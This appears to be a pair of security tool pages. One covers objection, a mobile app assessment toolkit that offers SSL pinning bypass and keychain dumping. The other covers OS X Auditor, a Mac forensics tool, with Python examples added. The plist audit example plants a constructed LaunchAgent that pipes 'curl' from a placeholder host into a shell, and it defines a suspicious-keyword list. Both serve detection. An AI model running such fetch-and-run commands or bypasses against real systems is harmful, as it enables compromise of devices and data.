
objection is a runtime mobile exploration toolkit, powered by Frida. It was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device.
The project's name quite literally explains the approach as well, whereby runtime specific objects are injected into a running process and executed using Frida.
Note: This is not some form of jailbreak / root bypass. By using objection, you are still limited by all of the restrictions imposed by the applicable sandbox you are facing.

features
objection supports both iOS and Android, and new features and improvements are added regularly as the tool is used in real-world assessments. The following is a short list of only a few key features:
For all supported platforms, objection allows you to:
  • Patch iOS and Android applications, embedding a Frida gadget that can be used with objection or just Frida itself.
  • Interact with the filesystem, listing entries as well as upload & download files where permitted.
  • Perform various memory related tasks, such as listing loaded modules and their respective exports.
  • Attempt to bypass and simulate jailbroken or rooted environments.
  • Discover loaded classes and list their respective methods.
  • Perform common SSL pinning bypasses.
  • Dynamically dump arguments from methods called as you use the target application.
  • Interact with SQLite databases inline without the need to download the targeted database and use an external tool.
  • Execute custom Frida scripts.
iOS specific features in objection include the ability to:
  • Dump the iOS keychain, and export it to a file.
  • Dump data from common storage such as NSUserDefaults and the shared NSHTTPCookieStorage.
  • Dump various formats of information in human readable forms.
  • Bypass certain forms of TouchID restrictions.
  • Watch for method executions by targeting all methods in a class, or just a single method.
  • Monitor the iOS pasteboard.
  • Dump encoded .plist files in a human readable format without relying on external parsers.
Android specific features in objection include the ability to:
  • List the application's Activities, Services and Broadcast receivers.
  • Start arbitrary Activities available in the target application.
  • Watch a class method, reporting execution as it happens.

screenshots
The following screenshots show the main objection REPL, connected to a test application on both an iPad running iOS 10.2.1 and a Samsung Galaxy S5 running Android 6.

A file system listing of the iOS application's main bundle

A file system listing of the Android application's bundle

iOS Keychain dumped for the current application, and later written to a file called keychain.json

Inline SQLite query tool

SSL Pinning bypass running for an iOS application

SSL Pinning bypass running for an Android application


sample usage
A sample session, where objection version 0.1 is used to explore the application's environment. Newer versions set the REPL prompt to the current application's name, but usage has remained the same:



prerequisites
To run objection, all you need is the python3 interpreter to be available. Installation via pip should take care of all of the dependencies needed. For more details, please see the prerequisites section on the project wiki.
As for the target mobile applications: on iOS an unencrypted IPA is needed, while on Android the normal APK should be fine. If you have the source code of the iOS application you want to explore, you can simply embed and load FridaGadget.dylib from within the Xcode project.

installation
Installation is simply a matter of pip3 install objection. This will give you the objection command.
For more detailed update and installation instructions, please refer to the wiki page here.


objection - Runtime Mobile Exploration


OS X Auditor is a free Mac OS X computer forensics tool.
OS X Auditor parses and hashes the following artifacts on the running system or a copy of a system you want to analyze:
  • the kernel extensions
  • the system agents and daemons
  • the third-party agents and daemons
  • the old and deprecated system and third-party startup items
  • the users' agents
  • the users' downloaded files
  • the installed applications
It extracts:
  • the users' quarantined files
  • the users' Safari history, downloads, topsites, LastSession, HTML5 databases and localstore
  • the users' Firefox cookies, downloads, formhistory, permissions, places and signons
  • the users' Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage
  • the users' social and email accounts
  • the WiFi access points the audited system has been connected to (and tries to geolocate them)
It also looks for suspicious keywords in the .plist files themselves.
It can verify the reputation of each file on:
  • Team Cymru's MHR
  • VirusTotal
  • your own local database
It can aggregate all logs from the following directories into a zipball:
  • /var/log (-> /private/var/log)
  • /Library/logs
  • the user's ~/Library/logs
Finally, the results can be:
  • rendered as a simple txt log file (so you can cat-pipe-grep in them… or just grep)
  • rendered as an HTML log file
  • sent to a Syslog server
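The three checks described above (hashing each artifact, looking up the hash in a local reputation database, and scanning plists for suspicious keywords) fit together in a few functions. The block below is an added example written for this page, not OS X Auditor's own code: the keyword list, the local table layout hashes(sha256, verdict) and the two LaunchAgent plists it audits are all constructed here, and the directory it scans is a temporary one built on the fly.

```python
import hashlib
import plistlib
import sqlite3
import tempfile
from pathlib import Path

# Constructed keyword list in the spirit of the tool's plist keyword check; tune it to your fleet.
SUSPICIOUS_KEYWORDS = ("curl ", "| sh", "base64 -d", "/tmp/", "nohup ")


def sha256_file(path):
    """Stream-hash a file so large binaries never have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def _strings_in(value):
    """Yield every string nested anywhere inside a parsed plist value (keys included)."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for key, item in value.items():
            yield key
            yield from _strings_in(item)
    elif isinstance(value, (list, tuple)):
        for item in value:
            yield from _strings_in(item)


def plist_keyword_hits(path, keywords=SUSPICIOUS_KEYWORDS):
    """Return the sorted keywords found in any string of the plist, or None if it does not parse."""
    try:
        with open(path, "rb") as fh:
            data = plistlib.load(fh)  # handles both XML and binary plists
    except Exception:
        return None
    return sorted({kw for text in _strings_in(data) for kw in keywords if kw in text})


def lookup_local(conn, sha256):
    """Reputation lookup against a local database (assumed table: hashes(sha256, verdict))."""
    row = conn.execute("SELECT verdict FROM hashes WHERE sha256 = ?", (sha256,)).fetchone()
    return row[0] if row else "unknown"


def audit_dir(root, conn):
    """Hash every file under root, look it up locally, and keyword-scan any .plist."""
    results = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        digest = sha256_file(path)
        results.append({
            "path": path,
            "sha256": digest,
            "verdict": lookup_local(conn, digest),
            "keyword_hits": plist_keyword_hits(path) if path.suffix == ".plist" else [],
        })
    return results


def run_demo():
    """Build a throwaway LaunchAgents-style directory with constructed plists and audit it."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE hashes (sha256 TEXT PRIMARY KEY, verdict TEXT)")
    root = Path(tempfile.mkdtemp(prefix="launchagents-"))

    # A vetted agent: its hash is recorded in the local database.
    known_good = root / "com.example.updater.plist"
    with open(known_good, "wb") as fh:
        plistlib.dump({"Label": "com.example.updater",
                       "ProgramArguments": ["/usr/local/bin/updater", "--check"],
                       "RunAtLoad": True}, fh)
    conn.execute("INSERT INTO hashes VALUES (?, ?)", (sha256_file(known_good), "known-good"))

    # An agent nobody has vetted, whose arguments pipe a download straight into a shell.
    unknown = root / "com.example.helper.plist"
    with open(unknown, "wb") as fh:
        plistlib.dump({"Label": "com.example.helper",
                       "ProgramArguments": ["/bin/sh", "-c",
                                            "curl -s http://placeholder.invalid/stage | sh"],
                       "RunAtLoad": True, "KeepAlive": True}, fh)

    return {r["path"].name: r for r in audit_dir(root, conn)}


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(name, result["verdict"], result["keyword_hits"], result["sha256"][:16])
```

The keyword scan walks dictionary keys as well as values, since a persistence entry can hide its intent in either; an unparsable plist is reported as None rather than as "no hits" so it shows up in the report instead of silently passing.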

Author
Jean-Philippe Teissier - @Jipe_ & al.

Support
OS X Auditor started as a week-end project and is now barely maintained. It has been forked by the great guys @ Yelp who created osxcollector.
If you are looking for a production / corporate solution, I do recommend that you move to osxcollector (https://github.com/Yelp/osxcollector).

How to install
Just copy all files from GitHub.

Dependencies
If you plan to run OS X Auditor on a Mac, you get full plist parsing support from the OS X Foundation framework through pyobjc:
pip install pyobjc
If you can't install pyobjc, or if you plan to run OS X Auditor on an OS other than Mac OS X, you may run into trouble with plist parsing; install these instead:
pip install biplist
pip install plist
These dependencies will be removed once a working native plist module is available in Python.

How to run
  • OS X Auditor runs well with python >= 2.7.2 (2.7.9 is OK). It does not run with a different version of python yet (due to the plist nightmare).
  • OS X Auditor is maintained to work on the latest OS X version. It will do its best on older OS X versions.
  • You must run it as root (or via sudo) if you want to use it on a running system; otherwise it won't be able to access some system files and other users' files.
  • If you're using API keys from environment variables (see below), you need to use sudo -E so that the user's environment variables are preserved.
Type osxauditor.py -h to get all the available options, then run it with the selected options,
e.g. [sudo -E] python osxauditor.py -a -m -l localhashes.db -H log.html

Setting Environment Variables
VirusTotal API:
export VT_API_KEY=aaaabbbbccccddddeeee

Artifacts

Users
  • Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2
  • Library/Preferences/com.apple.LaunchServices.QuarantineEvents
  • Library/Preferences/com.apple.loginitems.plist
  • Library/Mail Downloads/
  • Library/Containers/com.apple.mail/Data/Library/Mail Downloads
  • Library/Accounts/Accounts3.sqlite
  • Library/Containers/com.apple.mail/Data/Library/Mail/V2/MailData/Accounts.plist
  • Library/Preferences/com.apple.recentitems.plist
  • Firefox
    • Library/Application Support/Firefox/Profiles/
      • cookies.sqlite
      • downloads.sqlite
      • formhistory.sqlite
      • places.sqlite
      • signons.sqlite
      • permissions.sqlite
      • addons.sqlite
      • extensions.sqlite
      • content-prefs.sqlite
      • healthreport.sqlite
      • webappsstore.sqlite
  • Safari
    • Library/Safari/
      • Downloads.plist
      • History.plist
      • TopSites.plist
      • LastSession.plist
      • Databases
      • LocalStorage
  • Chrome
    • Library/Application Support/Google/Chrome/Default/
      • History
      • Archived History
      • Cookies
      • Login Data
      • Top Sites
      • Web Data
      • databases
      • Local Storage
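The browser history artifacts listed above store their timestamps in three different epochs, so building one timeline of user activity means normalizing them before sorting. The block below is an added example for this page, not OS X Auditor's own code: the table and key names it reads (moz_places and urls in the SQLite files, WebHistoryDates in the legacy Safari History.plist) and the epoch conventions in the comments are assumptions about the artifact formats, and the three visits it processes are constructed in memory rather than read from a real profile.

```python
import plistlib
import sqlite3
from datetime import datetime, timedelta, timezone

# Epoch conventions (assumed from the artifact formats; the page only lists the files):
#   Firefox places.sqlite -> moz_places.last_visit_date, microseconds since 1970-01-01 UTC
#   Chrome  History       -> urls.last_visit_time, microseconds since 1601-01-01 UTC
#   Safari  History.plist -> lastVisitedDate, seconds since 2001-01-01 UTC, stored as a string
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
MAC_ABSOLUTE_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)


def firefox_history(conn):
    """Visits from a places.sqlite connection (assumed schema: moz_places)."""
    rows = conn.execute(
        "SELECT url, title, visit_count, last_visit_date FROM moz_places "
        "WHERE last_visit_date IS NOT NULL")
    return [{"browser": "firefox", "url": u, "title": t, "visits": c,
             "visited": UNIX_EPOCH + timedelta(microseconds=ts)}
            for u, t, c, ts in rows]


def chrome_history(conn):
    """Visits from a Chrome History connection (assumed schema: urls)."""
    rows = conn.execute(
        "SELECT url, title, visit_count, last_visit_time FROM urls "
        "WHERE last_visit_time > 0")
    return [{"browser": "chrome", "url": u, "title": t, "visits": c,
             "visited": WEBKIT_EPOCH + timedelta(microseconds=ts)}
            for u, t, c, ts in rows]


def safari_history(plist_bytes):
    """Visits from the legacy Safari History.plist (assumed layout: WebHistoryDates, URL under key '')."""
    data = plistlib.loads(plist_bytes)
    out = []
    for entry in data.get("WebHistoryDates", []):
        out.append({"browser": "safari", "url": entry[""], "title": entry.get("title", ""),
                    "visits": int(entry.get("visitCount", 1)),
                    "visited": MAC_ABSOLUTE_EPOCH
                    + timedelta(seconds=float(entry["lastVisitedDate"]))})
    return out


def build_timeline(*sources):
    """Merge per-browser rows into one list ordered by normalized UTC visit time."""
    return sorted((row for src in sources for row in src), key=lambda r: r["visited"])


def run_demo():
    """Constructed sample artifacts: one visit per browser, spaced one hour apart."""
    ff = sqlite3.connect(":memory:")
    ff.execute("CREATE TABLE moz_places (url TEXT, title TEXT, visit_count INTEGER, "
               "last_visit_date INTEGER)")
    ff.execute("INSERT INTO moz_places VALUES (?, ?, ?, ?)",
               ("https://example.invalid/firefox", "Firefox visit", 2, 1_700_000_000_000_000))

    ch = sqlite3.connect(":memory:")
    ch.execute("CREATE TABLE urls (url TEXT, title TEXT, visit_count INTEGER, "
               "last_visit_time INTEGER)")
    # Same instant as the Firefox visit plus one hour, expressed in the 1601 epoch.
    ch.execute("INSERT INTO urls VALUES (?, ?, ?, ?)",
               ("https://example.invalid/chrome", "Chrome visit", 1, 13_344_477_200_000_000))

    # One hour before the Firefox visit, expressed in seconds since 2001.
    sf = plistlib.dumps({"WebHistoryDates": [
        {"": "https://example.invalid/safari", "title": "Safari visit",
         "lastVisitedDate": "721689200.0", "visitCount": 3}]})

    return build_timeline(firefox_history(ff), chrome_history(ch), safari_history(sf))


if __name__ == "__main__":
    for row in run_demo():
        print(row["visited"].isoformat(), row["browser"], row["visits"], row["url"])
```

Keeping every timestamp as a timezone-aware UTC datetime means the merge step is a plain sort, and the same epoch constants apply to the other artifacts in the list: the LaunchServices quarantine database and other Apple-produced files use the 2001 epoch, while Chromium-derived stores use the 1601 one.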

System
  • /System/Library/LaunchAgents/
  • /System/Library/LaunchDaemons/
  • /System/Library/ScriptingAdditions/
  • /System/Library/StartupItems/Library/ScriptingAdditions/
  • /System/Library/Extensions/
  • /System/Library/CoreServices/SystemVersion.plist
  • /Library/LaunchAgents/
  • /Library/LaunchDaemons/
  • /Library/StartupItems/
  • /Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist
  • /Library/logs
  • /var/log
  • /etc/localtime
  • StartupParameters.plist
  • /private/var/db/dslocal/nodes/Default/groups/admin.plist
  • /private/var/db/dslocal/nodes/Default/users

Related work

Disk Arbitrator
Disk Arbitrator is a Mac OS X forensic utility designed to help the user ensure correct forensic procedures are followed during imaging of a disk device. Disk Arbitrator is essentially a user interface to the Disk Arbitration framework, which enables a program to participate in the management of block storage devices, including the automatic mounting of file systems. When enabled, Disk Arbitrator blocks the mounting of file systems, so that a volume is never mounted read-write and the integrity of the evidence is preserved.
https://github.com/aburgh/Disk-Arbitrator

Volafox
volafox, a.k.a. the 'Mac OS X Memory Analysis Toolkit', is developed in Python 2.x.
https://code.google.com/p/volafox/

Mandiant Memoryze(tm) for the Mac
Memoryze for the Mac is free memory forensic software that helps incident responders find evil in memory… on Macs. Memoryze for the Mac can acquire and/or analyze memory images. Analysis can be performed on offline memory images or on live systems.
http://www.mandiant.com/resources/download/mac-memoryze

Volatility MacMemoryForensics
https://code.google.com/p/volatility/wiki/MacMemoryForensics


OSXAuditor - Free Mac OS X Computer Forensics Tool